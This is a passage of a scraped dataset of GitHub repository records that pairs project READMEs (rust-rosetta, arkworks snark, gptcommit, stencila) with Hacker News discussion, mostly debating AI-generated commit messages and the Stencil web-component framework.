I'm asking because not being able to install all plugins mentioned in .tool-versions automatically has been my biggest gripe with asdf.Not my project but found if while looking into the \"asdf\" project's performance issues ticket: https://github.com/asdf-vm/asdf/issues/290#issuecomment-1406...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "rust-rosetta/rust-rosetta", "link": "https://github.com/rust-rosetta/rust-rosetta", "tags": ["rosetta-code", "rust", "hacktoberfest"], "stars": 667, "description": "Implementing Rosetta Code problems in Rust.", "lang": "Rust", "repo_lang": "", "readme": "# rust-rosetta #\n![Continuous integration](https://github.com/rust-rosetta/rust-rosetta/workflows/Continuous%20integration/badge.svg)\n\nA repository for completing [this issue on rust-lang/rust](https://github.com/rust-lang/rust/issues/10513). This repository contains minimal working code for many simple (and not so simple) tasks. New contributors and learners of the language are welcome. We will try to work with you to make the code more idiomatic if you'd like!\n\nDevelopment is done on the `nightly` channel of Rust. You can get this using [`rustup`](https://www.rustup.rs/).\n\nThis is a project for learning. Working on a problem and need some help? Drop by #rust-rosetta on [irc.mozilla.org](https://kiwiirc.com/client/irc.mozilla.org). *(Note: It's an asynchronous protocol, responses may be slow!)*\n\n## Tasks Remaining ##\n\n[List of Tasks Remaining](http://rosettacode.org/wiki/Reports:Tasks_not_implemented_in_Rust)\n\n> Important: Not all `rust-rosetta` tasks exist in their current form on Rosetta Code. Please cross-check with this repository before you start. Alternatively, check out [rust-rosetta coverage](https://euclio.github.io/rosetta-coverage) to see an automatically generated report of which tasks have been implemented where.\n\n### Coverage ###\n\nThe main crate contains a `coverage` binary that is useful for discovering\nincomplete solutions, or finding solutions that are different from the version\nposted to the Rosetta Code wiki. To see what commands are available:\n\n```sh\n$ cargo run --release --bin coverage -- --help\n```\n\n## Tasks Complete ##\n\nAll tasks that have been completed are listed (along with a link to the problem) in [`Cargo.toml`](./Cargo.toml).\n\n## Contributing ##\n\nLooking to contribute? Great! Take a look at [CONTRIBUTING.md](CONTRIBUTING.md) to get started.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "arkworks-rs/snark", "link": "https://github.com/arkworks-rs/snark", "tags": ["cryptography", "zero-knowledge-proofs", "r1cs"], "stars": 666, "description": "Interfaces for Relations and SNARKs for these relations", "lang": "Rust", "repo_lang": "", "readme": "

# SNARK and Relation Traits
\n\nThe arkworks ecosystem consists of Rust libraries for designing and working with __zero knowledge succinct non-interactive arguments (zkSNARKs)__. This repository contains efficient libraries that describe interfaces for zkSNARKs, as well as interfaces for programming them.\n\nThis library is released under the MIT License and the Apache v2 License (see [License](#license)).\n\n**WARNING:** This is an academic proof-of-concept prototype, and in particular has not received careful code review. This implementation is NOT ready for production use.\n\n## Directory structure\n\nThis repository contains two Rust crates:\n\n* [`ark-snark`](snark): Provides generic traits for zkSNARKs\n* [`ark-relations`](relations): Provides generic traits for NP relations used in programming zkSNARKs, such as R1CS\n\n## Overview\n\nThis repository provides the core infrastructure for using the succinct argument systems that arkworks provides. Users who want to produce arguments about various problems of interest will first reduce those problems to an NP relation, various examples of which are defined in the `ark-relations` crate. Then a SNARK system defined over that relation is used to produce a succinct argument. The `ark-snark` crate defines a `SNARK` trait that encapsulates the general functionality, as well as specific traits for various types of SNARK (those with transparent and universal setup, for instance). Different repositories within the arkworks ecosystem implement this trait for various specific SNARK constructions, such as [Groth16](https://github.com/arkworks-rs/groth16), [GM17](https://github.com/arkworks-rs/gm17), and [Marlin](https://github.com/arkworks-rs/marlin).\n\n## Build guide\n\nThe library compiles on the `stable` toolchain of the Rust compiler. To install the latest version of Rust, first install `rustup` by following the instructions [here](https://rustup.rs/), or via your platform's package manager. Once `rustup` is installed, install the Rust toolchain by invoking:\n```bash\nrustup install stable\n```\n\nAfter that, use `cargo`, the standard Rust build tool, to build the libraries:\n```bash\ngit clone https://github.com/arkworks-rs/snark.git\ncd snark\ncargo build --release\n```\n\n## Tests\nThis library comes with comprehensive unit and integration tests for each of the provided crates. 
Run the tests with:\n```bash\ncargo test --all\n```\n\n## License\n\nThe crates in this repo are licensed under either of the following licenses, at your discretion.\n\n * Apache License Version 2.0 ([LICENSE-APACHE](LICENSE-APACHE) or http://www.apache.org/licenses/LICENSE-2.0)\n * MIT license ([LICENSE-MIT](LICENSE-MIT) or http://opensource.org/licenses/MIT)\n\nUnless you explicitly state otherwise, any contribution submitted for inclusion in this library by you shall be dual licensed as above (as defined in the Apache v2 License), without any additional terms or conditions.\n\n[zexe]: https://ia.cr/2018/962\n\n## Acknowledgements\n\nThis work was supported by:\na Google Faculty Award;\nthe National Science Foundation;\nthe UC Berkeley Center for Long-Term Cybersecurity;\nand donations from the Ethereum Foundation, the Interchain Foundation, and Qtum.\n\nAn earlier version of this library was developed as part of the paper *\"[ZEXE: Enabling Decentralized Private Computation][zexe]\"*.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zurawiki/gptcommit", "link": "https://github.com/zurawiki/gptcommit", "tags": ["cli", "git", "githook", "large-language-models", "rust"], "stars": 665, "description": "A git prepare-commit-msg hook for authoring commit messages with GPT-3. ", "lang": "Rust", "repo_lang": "", "readme": "# `gptcommit`\n\n[![Github Contributors](https://img.shields.io/github/contributors/zurawiki/gptcommit.svg)](https://github.com/zurawiki/gptcommit/graphs/contributors)\n[![Github Stars](https://img.shields.io/github/stars/zurawiki/gptcommit.svg)](https://github.com/zurawiki/gptcommit/stargazers)\n[![CI](https://github.com/zurawiki/gptcommit/actions/workflows/ci.yml/badge.svg)](https://github.com/zurawiki/gptcommit/actions/workflows/ci.yml)\n\n[![crates.io status](https://img.shields.io/crates/v/gptcommit.svg)](https://crates.io/crates/gptcommit)\n[![crates.io downloads](https://img.shields.io/crates/d/gptcommit.svg)](https://crates.io/crates/gptcommit)\n[![Rust dependency status](https://deps.rs/repo/github/zurawiki/gptcommit/status.svg)](https://deps.rs/repo/github/zurawiki/gptcommit)\n\nA git prepare-commit-msg hook for authoring commit messages with GPT-3. With this tool, you can easily generate clear, comprehensive and descriptive commit messages letting you focus on writing code.\n\nSee [announcement blog post](https://zura.wiki/post/never-write-a-commit-message-again-with-the-help-of-gpt-3/).\n\n## Demo\n\n[![asciicast](https://asciinema.org/a/552380.svg)](https://asciinema.org/a/552380)\n\n## Installation\n\n1. Install this tool locally with `cargo` (recommended).\n\n```sh\ncargo install --locked gptcommit\n```\n\nor on macOS, use homebrew\n\n```sh\nbrew install zurawiki/brews/gptcommit\n```\n\n2. In your `git` repository, run the following command to install `gptcommit` as a git prepare-commit-msg hook. You will need to provide an OpenAI API key to complete the installation.\n\n```\ngptcommit install\n```\n\n## Usage\n\nTo use `gptcommit`, simply run `git commit` as you normally would. The hook will automatically generate a commit message for you using GPT-3. If you're not satisfied with the generated message, you can always edit it before committing.\n\nNote: By default, `gptcommit` uses the GPT-3 model. 
Please ensure you have sufficient credits in your OpenAI account to use it.\n\n## Features\n\n`gptcommit` supports a number of configuration options that are read from `$HOME/.config/gptcommit/config.toml`.\nConfigs are applied in the following order:\n\n- User settings as read from `$HOME/.config/gptcommit/config.toml`.\n- The settings as read from the repo clone at `$GIT_ROOT/.git/gptcommit.toml`.\n- Environment variables starting with `GPTCOMMIT__*`.\n\n### Set your OpenAI API key\n\nPersist your OpenAI key:\n\n```sh\ngptcommit config set openai.api_key sk-...\n```\n\nor set it just for your local repo:\n\n```sh\ngptcommit config set --local openai.api_key sk-...\n```\n\nYou can also configure this setting via the `GPTCOMMIT__OPENAI__API_KEY` environment variable.\n\nTo maintain compatibility with other OpenAI clients, we support the `OPENAI_API_KEY` environment variable. This will take the highest precedence.\n\n### Try out a different OpenAI model\n\n`gptcommit` uses `text-davinci-003` by default. The model can be configured to use other models as shown below:\n\n```sh\ngptcommit config set openai.model text-davinci-002\n```\n\nYou can also configure this setting via the `GPTCOMMIT__OPENAI__MODEL` environment variable.\n\nFor a list of public OpenAI models, check out the [OpenAI docs](https://beta.openai.com/docs/models/overview). You can also bring in your own fine-tuned model.\n\n### Allow re-summarizing when amending commits\n\n```sh\ngptcommit config set allow-amend true\n```\n\n## Common Issues / FAQs\n\n### How can I reduce my OpenAI usage bill?\n\nIn the current design, gptcommit issues N+2 prompts, where N is the number of modified files with diffs under the max_token_limit. The other prompts are the title and summary.\n\nOpenAI Completions are billed by \"tokens\" that are both sent and generated. Pricing per token depends on the model used. The number of tokens generated is generally predictable (as a commit message is usually only so big) but gptcommit could be sending over a lot of tokens in the form of diff data.\n\nToday, I see two low-hanging solutions for reducing cost:\n\n- Switch to a different model using the openai.model configuration option\n- Reduce the size of prompts and diff data sent to OpenAI\n\nOpenAI's pricing page can be found on their website.\n\n### The githook is not running when I commit\n\nBy default, the githook is only run for new commits.\nIf a template is set or the commit is being amended, the githook will skip by default.\n\nBecause the githook detected the user is supplying their own template, we make sure not to overwrite it with GPT. You can remove the commit template by making sure `git config --local commit.template` is blank.\n\nYou can allow gptcommit to summarize amended commits with the `allow-amend` configuration shown above.
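\n\nFor intuition about where the hook fits in, here is an illustrative Rust sketch of a bare-bones `prepare-commit-msg` hook (this is not gptcommit's actual code): git invokes the hook with the path to the commit message file as its first argument, and the hook may rewrite that file. It mirrors the skip-when-a-message-already-exists behavior described above.\n\n```rust\nuse std::{env, fs};\n\nfn main() -> std::io::Result<()> {\n    // git passes the path to .git/COMMIT_EDITMSG as the first argument.\n    let msg_path = env::args()\n        .nth(1)\n        .expect(\"usage: prepare-commit-msg <msg-file> [source] [sha]\");\n    let existing = fs::read_to_string(&msg_path)?;\n    // If the user already supplied a template or message, leave it alone.\n    if existing.trim().is_empty() {\n        // A real hook would generate this text from the staged diff.\n        fs::write(&msg_path, \"chore: placeholder generated message\\n\")?;\n    }\n    Ok(())\n}\n```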
You can remove the commit template by making sure `git config --local commit.template` is blank.\n\nYou can allow gptcommit to summarize amended commits with the `allow-amend` configuration shown above.\n\n## Derived Works\n\nAll of these awesome projects are built using `gptcommit`.\n\n- A VSCode extension you can\n [install here](https://marketplace.visualstudio.com/items?itemName=pwwang.gptcommit) | [GitHub](https://github.com/pwwang/vscode-gptcommit)\n\n## Encountered any bugs?\n\nIf you encounter any bugs or have any suggestions for improvements, please open an issue on the repository.\n\n\n## License\n\nThis project is licensed under the [MIT License](./LICENSE).\n", "readme_type": "markdown", "hn_comments": "There are tools that I wish didn\u2019t exist and this is one of them.Why are the demos videos?If you're unable to write your own commit messages that's a strong signal to me that either your commits are too large or that you're unable to explain in simple words what you just did. While the first can be remedied I would find it hard working with someone who consistently displayed the second.I can kind of understand getting help writing the description of a large PR. But a commit message? Whose commits are so long so often that they need the help of an AI assistant to come up with the contents?Cool, but I hope his is never used as is, just submit with some keyword and call the latest version of GPT on the diff when looking through the history later. A bad commit message is worse than no message and it can\u2019t be easily fixed.The very last thing you should do is commit a GPT-3 generated commit message for a fairly simple reason: if GPT-3 can interpret and and explain the change as written, there is no reason to commit that message. You will always be able re-run the generator at any later date, over any range of changes, to get the same or (presumably, in future) improved results.As pointed out by other comments, the commit message should be telling you facts about the change that are not evident from the change itself. GPT-3 can't tell readers why the change happened.To everyone hating on this...I think a GPT-3 summary of a diff is a great thing to have, because it's a summary of the change and thus can be quicker to grok than picking through a diff. Also this doesn't seem to preclude a developer adding their own text to the commit (the why, etc). Finally, if the summary looks weird/incoherent it could serve as a signal to the developer that the commit needs more work.this is awful.1. If automating writing commit messages significantly improves your experience as a developer, you're doing something wrong.2. If GPT-3 can write commit messages even close to as clear as you can, you're doing something wrong.Comments here are acting like you can't add/edit the commit. It offers a starting point. Yes it's just-above-diff level, but it is at-least-above-diff level.But my main though is that IDK about using this for anything closed source. Feed openai's API your codebase, one commit at a time. Even if they promise not to train on your prompt history today, ToS could change. 
Seems fine if you run it locally though.Fun fact: you can probably turn this around too: Write a fictional commit history and have ChatGPT generate the actual commits for you.Did the OP use the tool to write his own commit messages?A lot of the commit messages were typical and sort of redundant but this one stood out to me\nhttps://github.com/zurawiki/gptcommit/commit/82294555e7269e6...\"Add github token to address GH Workflow rate limits\"This is a good commit message, it describes a problem and a solution. I'd be very impressed if the GPTCommit tool wrote this and knew why the github token was being added.I don\u2019t get the hate. Don\u2019t use it all the time, but this could be useful as part of a danger report.A readable summary for the ones who may not understand code - your developer will never write that.Might as well commit \u201cI don\u2019t remember writing that commit\u201d because that\u2019s going to be your every answer when someone has a question about what you did.I'll write a shitload of commit messages before I'll give OpenAI my phone number.Neat concept, but this opens up a can of worms for corporate security. Pretty sure I won't get approval to submit proprietary code to a third party service just because I was too lazy to write a few lines of text. Might be helpful to open source projects?At least the first line of commit messages shouldn\u2019t describe WHAT changed but WHY the change was made.Now do this for branching strategies.This is amazing. Humans should only need to read commit messages, never write them.The repo for this isn't eating it's own dogfood.I don't really ever want to read answers from GPT to questions that I didn't knowingly myself ask GPT. If GPT can write a commit message from you, don't write it at all and let me ask it that if that's what I want. It may be a positive to you to spend a few seconds less on commit messages but it's a net negative for the world for it to become polluted with vast amounts of flatly incorrect text with no knowledge as to its provenance. I'd rather have no commit message than one that I can't trust whether it's written by the same human that wrote the code or not.Put another way, you asking GPT for stuff that it learned from Stack Overflow: good. Using it to post to Stack Overflow: bad.I find commit messages have more value when they don't just repeat what you can see by looking at a diff but when they explain the reasons behind.In the early days of Covid, the web was awash with all sorts of stupid fucking designs that reimagined public space under the new normal or whatever. It was chaff that creators and readers alike knew would never be put to practical use, or even be produced in the first place. There's a good writeup about it here.https://mcmansionhell.com/post/618938984050147328/coronagrif...I think the same phenomenon is at play here. Everybody sharing their own silly parrot tricks: it's the least interesting topic in the world right now.With WhatTheCommit [1], I never have to come up with commit messages again. /sI even wrote an IntelliJ IDEA plugin 9 years ago [2]. Half as a joke, half to learn about IDEA plugin development. I'm puzzled by seing so many people actually using it. Last month the HTTP link became invalid, and soon after someone opened a PR with a fix. 
I really hope noone actually uses those commit messages on shared repositories.[1] https://whatthecommit.com/[2] https://darekkay.com/blog/what-the-commit-plugin-for-intelli...If you're looking for a Python variant of this tool: https://github.com/abi/autocommitI was wondering if there is a possibility of obtaining an offline version of the service, in order to mitigate the inherent risks associated with transmitting proprietary code to external servers, thus ensuring optimal security and confidentiality of said code?Writing commit messages (or comments in general) is like practicing vocabulary, but for your mental understanding of the current problem.Taking a step back and thinking about what I have actually done often helps me to find misconceptions, the worst bugs of them all.Automating this away would be like learning a foreign language by pasting book exercises into a translation app... you may get good grades, but does it help your understanding if you didn't put in the effort yourself?Because what we need is more of the what was done, with no regard to the why. Why provide any context as to why the change was made when you can fill it with an AI description of what one could accurately tell by looking at the code? I kinda can't believe this isn't a joke. Just squash it to the emoji that best captures the sentiment! Why use the tool to enhance you and your peers lives, when you can use AI to make it pointless!Perhaps this could be more useful if it could be fed information from a bug tracker, so it could use the context to create a meaningful (if inaccurate) commit message.Be more impressed if I write the commit message and GPT writes the code than vice versa.If I wrote the code, writing a commit message is trivial.I like writing commit messages. I find it helps me to think through and explain the change that I'm committing. personal quirk: for major commits I'll add fun ascii art, just as a treatThis is interesting but I\u2019d hate to work on a project where this was used. Commits should tell me why a change happened not just what code changed.I don't want to debate the presence or absence of merits in this tool (these are extensively covered in other comments), but I want to point out that even in the demo examples 2 out of 3 commit messages are plainly incorrect:- in Demo 1 tool wrote \"Switch to colored output...\" while in the diff we can see that colored output was already present;- in Demo 3 tool wrote \"Add installation options and demo link to README\", while in the actuall diff we only see a link being added, no changes to installation options.Props to the author for being honest and not cherry-picking the examples.The peak of human society right hereThe worst part about GPT-3 is people using it to automate things where the entire value comes from what the human annotates rather than automates. This is an idea, which like many others involving GPT-3, which I believe will destroy more value than it creates.This is horrible. Commit messages should contain the reason why this change has been made and not imprecise prose summaries of what the diff looks like.This is fun.Would also be cool to generate commit messages while viewing history, it could really do a good job of orienting you. I'm imagining \"human commit msg | gpt commit msg\" so you can look at both. 
It's a little simplistic right now, kinda just describes the diff, but GPT-3.2 could rock.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "stencila/stencila", "link": "https://github.com/stencila/stencila", "tags": ["executable", "documents"], "stars": 665, "description": "Author, collaborate on, and publish beautiful interactive documents", "lang": "Rust", "repo_lang": "", "readme": "
\n\t\"Stencila\"\n
\n
\n\n## \ud83d\udc4b Welcome\n\nThis is the main repository of [Stencila](https://stenci.la), a platform for authoring, collaborating on, and publishing executable documents.\n\nStencila is comprised of several open source packages, written in a variety of programming languages. This repo acts as an entry point to these other packages as well as hosting code for our desktop and CLI tools.\n\nWe \ud83d\udc95 contributions! All types of contributions: ideas \ud83e\udd14, examples \ud83d\udca1, bug reports \ud83d\udc1b, documentation \ud83d\udcd6, code \ud83d\udcbb, questions \ud83d\udcac. If you are unsure of where to make a contribution feel free to open a new [issue](https://github.com/stencila/stencila/issues/new) or [discussion](https://github.com/stencila/stencila/discussions/new) in this repository (we can always move them elsewhere if need be).\n\n
\n\n## \ud83d\udcdc Help\n\nFor documentation, including demos and reference guides, please go to our Help site https://help.stenci.la/. That site is developed in the [`help`](help#readme) folder of this repository and contributions are always welcome.\n\n
\n\n## \ud83c\udf81 Hub\n\nIf you don't want to install anything, or just want to try out Stencila, https://hub.stenci.la is the best place to start. It's a web application that makes all our software available via intuitive browser-based interfaces. You can contribute to Stencila Hub at [`stencila/hub`](https://github.com/stencila/hub).\n\n
\n\n## \ud83d\udda5\ufe0f Desktop\n\nIf you'd prefer to use Stencila on your own computer, the Stencila Desktop is a great place to start. It is still in the early stages of (re)development but please see the [`desktop`](desktop#readme) folder for its current status and how you can help out!\n\n
\n\n## \u2328\ufe0f Command line tool\n\n### \ud83d\udce6 Install\n\nThe CLI is in the early stages of development (all contributions welcome!). We don't necessarily recommend installing it yet, but if you are an early adopter, we'd also appreciate any feedback \ud83d\udc96. You can download standalone binaries for MacOS, Windows or Linux from the [latest release](https://github.com/stencila/stencila/releases/latest).\n\n#### Windows\n\nTo install the latest release download `stencila-<version>-x86_64-pc-windows-msvc.zip` from the [latest release](https://github.com/stencila/stencila/releases/latest) and place it somewhere on your `PATH`.\n\n#### MacOS\n\nTo install the latest release in `/usr/local/bin` just use,\n\n```bash\ncurl -L https://raw.githubusercontent.com/stencila/stencila/master/install.sh | bash\n```\n\nTo install a specific version, append `-s vX.X.X`. Or, if you'd prefer to do it manually, download `stencila-<version>-x86_64-apple-darwin.tar.gz` from one of the [releases](https://github.com/stencila/stencila/releases) and then,\n\n```bash\ntar xvf stencila-*.tar.gz\nsudo mv -f stencila /usr/local/bin # or wherever you prefer\n```\n\n#### Linux\n\nTo install the latest release in `~/.local/bin/` just use,\n\n```bash\ncurl -L https://raw.githubusercontent.com/stencila/stencila/master/install.sh | bash\n```\n\nTo install a specific version, append `-s vX.X.X`. Or, if you'd prefer to do it manually, download `stencila-<version>-x86_64-unknown-linux-gnu.tar.gz` from one of the [releases](https://github.com/stencila/stencila/releases) and then,\n\n```bash\ntar xvf stencila-*.tar.gz\nmv -f stencila ~/.local/bin/ # or wherever you prefer\n```\n\n### \ud83d\ude80 Use\n\nGet started by consulting the built-in help:\n\n```sh\nstencila help\n```\n\n### \ud83d\udee0\ufe0f Develop\n\nThe CLI is developed in the [../rust](../rust) folder. See there for more details.\n\n
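To make the `-s vX.X.X` instruction above concrete: the flag is appended to the `bash` end of the install pipe. This is only a sketch; replace `vX.X.X` with a real tag from the releases page.\n\n```sh\n# Install a pinned CLI version (vX.X.X is a placeholder, not a real tag)\ncurl -L https://raw.githubusercontent.com/stencila/stencila/master/install.sh | bash -s vX.X.X\n```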
\n\n## \ud83d\udd0c Plugins\n\nThe `stencila` Hub, Desktop and CLI all rely on _plugins_ to provide much of their functionality. You can install plugins with the `stencila` Desktop or CLI tool, using a plugin's name or an alias,\n\n```sh\nstencila plugins install <plugin>\n```\n\nThe following table lists the main plugins. These plugins are in various stages of development and not all of them are compatible with the Desktop and CLI. Generally, it won't be worth installing a plugin before it reaches `v1` and coverage of at least 90%.\n\n> \ud83d\udea8 We are in the process of deprecating the \"executor\" plugins `rasta`, `pyla` and `jesta` and instead focusing on a tighter integration with Jupyter kernels by way of porting the functionality in `jupita` into the core Rust library.\n\n| Plugin | Aliases | Version | Coverage | Primary functionality |\n| -------- | ------------ | ----------- | ----------- | --------------------- |\n| [encoda] | `converter` | ![encoda-v] | ![encoda-c] | Convert documents between file formats |\n| [jesta] | `javascript` | ![jesta-v] | ![jesta-c] | Compile, build and execute documents that use JavaScript |\n| [rasta] | `r` | ![rasta-v] | ![rasta-c] | Compile, build and execute documents that use R |\n| [pyla] | `python` | ![pyla-v] | ![pyla-c] | Compile, build and execute documents that use Python |\n| [jupita] | `jupyter` | ![jupita-v] | ![jupita-c] | Execute documents that use Jupyter kernels |\n| [dockta] | `docker` | ![dockta-v] | ![dockta-c] | Build Docker images for executable documents |\n| [nixta] | `nix` | ![nixta-v] | ![nixta-c] | Build Nix environments for executable documents |\n\n
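For example, based on the table above, the `encoda` plugin could be installed either by its name or by its `converter` alias (a usage sketch; as noted above, not every plugin is compatible with the Desktop and CLI yet):\n\n```sh\nstencila plugins install encoda\n# or, equivalently, using its alias\nstencila plugins install converter\n```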
\n\n## \ud83d\udc33 Docker images\n\nYou can use Stencila as a Docker image. We provide several images of varying sizes and capabilities. All include the `stencila` CLI as the image `ENTRYPOINT` but add varying numbers of plugins and packages.\n\nAt present the number of images listed below is limited. We plan to move the generic images e.g. [`stencila/executa-midi`](https://hub.docker.com/r/stencila/executa-midi) (which are currently built in the `dockta` repository), to this repository as we reach plugin compatibility for the relevant language packages.\n\n| Image | Size | Description |\n| ------------------- | ---------------------- | ------------------------------------ |\n| [stencila/stencila] | ![stencila-stencila-s] | Base image containing `stencila` CLI |\n| [stencila/node] | ![stencila-node-s] | Adds Node.js and `jesta` |\n\n
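Because the `stencila` CLI is each image's `ENTRYPOINT`, any arguments passed to `docker run` go straight to the CLI. A minimal sketch, assuming Docker is installed and using the base image:\n\n```sh\n# Runs `stencila help` inside the container and removes the container afterwards\ndocker run --rm stencila/stencila help\n```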
\n\n## \ud83d\udc69\u200d\ud83d\udcbb Language bindings\n\nIf you prefer, you can use Stencila from within your favorite programming language. Some of these language bindings are in an early, proof-of-concept state and are likely to be developed further only based on demand. If your favorite language is missing, or you would like to help us develop the bindings, [let us know!](https://github.com/stencila/stencila/discussions/new)\n\n| Language | Bindings | Status |\n| -------- | ----------------------- | --------------------------------- |\n| Node | [node](node#readme) | In-development (used for Desktop) |\n| Python | [python](python#readme) | Experimental |\n| R | [r](r#readme) | Experimental |\n\n[encoda]: https://github.com/stencila/encoda#readme\n[jesta]: https://github.com/stencila/jesta#readme\n[pyla]: https://github.com/stencila/pyla#readme\n[rasta]: https://github.com/stencila/rasta#readme\n[jupita]: https://github.com/stencila/jupita#readme\n[dockta]: https://github.com/stencila/dockta#readme\n[nixta]: https://github.com/stencila/nixta#readme\n[encoda-v]: https://img.shields.io/github/v/release/stencila/encoda\n[jesta-v]: https://img.shields.io/github/v/release/stencila/jesta\n[rasta-v]: https://img.shields.io/github/v/release/stencila/rasta\n[pyla-v]: https://img.shields.io/github/v/release/stencila/pyla\n[dockta-v]: https://img.shields.io/github/v/release/stencila/dockta\n[nixta-v]: https://img.shields.io/github/v/release/stencila/nixta\n[jupita-v]: https://img.shields.io/github/v/release/stencila/jupita\n[encoda-c]: https://img.shields.io/codecov/c/github/stencila/encoda\n[jesta-c]: https://img.shields.io/codecov/c/github/stencila/jesta\n[rasta-c]: https://img.shields.io/codecov/c/github/stencila/rasta\n[pyla-c]: https://img.shields.io/codecov/c/github/stencila/pyla\n[dockta-c]: https://img.shields.io/codecov/c/github/stencila/dockta\n[nixta-c]: https://img.shields.io/codecov/c/github/stencila/nixta\n[jupita-c]: https://img.shields.io/codecov/c/github/stencila/jupita\n[stencila/stencila]: https://hub.docker.com/r/stencila/stencila\n[stencila/node]: https://hub.docker.com/r/stencila/node\n[stencila-stencila-s]: https://img.shields.io/docker/image-size/stencila/stencila?label=size&sort=semver\n[stencila-node-s]: https://img.shields.io/docker/image-size/stencila/node?label=size&sort=semver\n", "readme_type": "markdown", "hn_comments": "Hello HN,Lots of people are willing to share there visual components for others to use and remix. This is great! There are thousands of stencils and component libraries out there. There is a problem though. You share your work in a closed ecosystem, the ecosystem of the design software you use. Sketch, Figma, one of the many Adobe's, OmniGraffle, you name it.To address this problem I started the SVG Stencils Project. SVG Stencils is a community driven project with the ambition to be an ecosystem for every designer, no mather what software or platform you use. As long as you can drag an SVG-file from your browser into your canvas you're good to go.The core part of SVG Stencils is the webapp hosted on GitHub. 
The SVG-components listed here can be dragged directly from your browser into your canvas.In a nutshell:- SVG Stencils are free for personal and commercial use- SVG Stencils and all its content will stay forever free and open source- Everyone can contribute by creating and submitting new stencils- Inkscape Extension for creating and publishing stencils- Good documentation- No advertisingHope you like it and I'm very excited to hear what you think off SVG StencilsHi HN,Lots of people are willing to share there visual work for others to use and remix. This is great! There are thousands of stencils and component libraries out there. There is a problem though. You share your work in a closed ecosystem, the ecosystem of the design software you use. Sketch, Figma, one of the many Adobe's, OmniGraffle, you name it.To address this problem I started the SVG Stencils Project. SVG Stencils is a\ncommunity driven project with the ambition to be an ecosystem for every designer, no mather what software or platform you use. As long as you can drag\nan SVG-file from your browser into your canvas you're good to go.The core part of SVG Stencils is the webapp hosted on GitHub. The SVG-components listed here can be dragged directly from your browser into your canvas.In a nutshell:- SVG Stencils are free for personal and commercial use\n- SVG Stencils and all its content will stay forever free and open source\n- Everyone can contribute by creating and submitting new stencils\n- Inkscape Extension for creating and publishing stencils\n- Good documentationHope you like it and I'm very excited to hear what you think off SVG Stencils.PS. If your from New Zealand, sorry for the world map without NZ. I'll replace this one ASAP.This article highlights Stencil's performance, which is great.As a dev, I think Stencil's superpower is that it can future proof your components. You can write a Stencil component and you can later use it in Angular or Vue or React or Elm or whatever. Or maybe even no framework at all -- just a templated server generated page with some Stencil components.That's pretty nice for a team that's transitioning between one framework and another or uses two different frameworks on two different sites but would like to share components between the two.Is AlpineJs a better Stencil ;) ;) ;) . Sorry couldn't resist ...Stencil is the best way to write Web Components if not a better React. If you like you can also write entire apps and Ionic library is perfect component library for it. It is fun to use and also uses TypeScript and it's simple and easy to understand.:\\13 years ago...Is Mootools a better jQuery?I tried Stencil a year ago and I didn't see anything too novel to warrant further investigation.One nitpick for the OP: the side-by-side code examples are screenshots without syntax highlighting. For an article comparing two frontend frameworks, that's quite an oversight.In their side-by-side, they use syntax conventions from 4 years ago for React (class based components and even using var to declare variables) while using the latest syntax conventions for Stencil.How is that a fair comparison?Stencil creators here. We love the title, but that is not our goal. We built Stencil for a very specific use case: building out a bunch of Web Components for our Ionic Framework project so they could run in any frontend stack. 
Stencil will generate React, Angular, and Vue bindings from a standard Web Component base, so developers in each of those frameworks get the native experience they expect, and any issues using Web Components (in React, for example) are smoothed out and fixed.Stencil is really focused on building design systems and reusable component sets, like the kind we needed for Ionic Framework.I can't wait to save the article's screenshots of code blocks to my Pinterest account!Ah, c'mon, I just recently became an expert in React.IMO TodoMVC is not a good way to compare front-end libraries/frameworks because the necessary complexity is too low to demonstrate how issues that would happen in a larger code base would be solved.\"server-side rendering with client side dehydration\"lol wtf \"dehydration\" haha (also \"Rolloup\")Still don't really get what Stencil is. Is it a actual single framework or a standard syntax that compiles to React, vue, .. component syntax? This talks about compiling JSX to bindings avoiding vdom diffing but as far as I know that is near impossible to do due to the variable nature of JSX..?And just a wall of unhighlighted fixed with code is very difficult to compare the differences. And would rather see bundle size comparisons rather than 6 lighthouse screenshots.We ended up not using it because of it's lack of ecosystem which is pretty ironic for an interoperable framework.\nE.g no documented mobx support, no competitive router.It\u2019s not solving enough problems or different enough for me to consider it seriously.If they're going to compare the two, at least use the React functional hooks pattern. They're comparing Stencil to the (basically) obsolete OO components pattern.There's a couple performance issues opened on the Stencil repo, as well as documented developer experience requests (e.g, Source Maps). With additional investment, I think Stencil has further potential to be an influential evolution in the front-end stack.Stencil the framework - perhaps not.But the idea of compiling to an (asymptotically) optimal vanilla JS application is a breath of fresh air in a world of Virtual DOM, Reactive Programming, Hooks etc.My favourite thing about this approach is that the end result is even half-readable, so with some practice it's possible to understand what's going on in your stack trace.I've been a front end developer for 18 years now and I've been tired of JS framework hype for almost half of those years. I saw the note from the creators that this was designed for a specific use case. That's great! It would also be great if the rest of the JS dev community would stop trying to find the Next New React. Please make it stop.Yes, It enables creating web components, static site generation, server-side rendering with client side dehydration. It even has documentation generation for Stencil components.I've been keeping an eye on Solid for my next project. It seems small, fast and ergonomic.I've been using Stencil to create a share component library for different projects/teams where I work. I've been pretty impressed. Soon our library will be used in React, Aurelia, and possibly Ember projects!> The third difference is event binding, where in Stencil they promote using arrow functions while React promotes explicit binding using the .bind() function.Does React really? 
I haven't used `.bind` in years, even before moving to mostly hooks-based components.In this React doc [1] it describes .bind as being for ES2015, and recommends arrow functions for ES6, except if it causes optimization issues.1. https://reactjs.org/docs/faq-functions.htmlAny headline that ends in a question mark can be answered by the word \"no\". -- Ian BetteridgeThis type of asshole marketing seems to become more and more popular. I saw ads for Amazon Video the other day on the floors of Dortmund, Germany.A simple improvement. add pins (even temporarily) to the PCB. Add pin holes to the top acrylic template. No need for the lower (outer) acrylic part. Plus the pin holes force very good alignment.Interesting idea. I've always done all of those parts with tweezers and eyeballs, but some of the TSSOP packages can be a bit of a challenge to line up well enough for reflow.If you used FR4 instead of acrylic or whatever, you might be able to leave the aligner stencil in place for reflow. That might let you do some of the smaller parts.\"While this setup has been working really well for large parts, small components haven't worked out\".Too bad. This is a good idea. I have some boards with lots of small components where this would help, and I have access to laser cutters. Maybe with a thinner plastic layer on top... Also, with small components, getting the placement stencil off without taking the tiny components with it may be tough.Board edge shearing 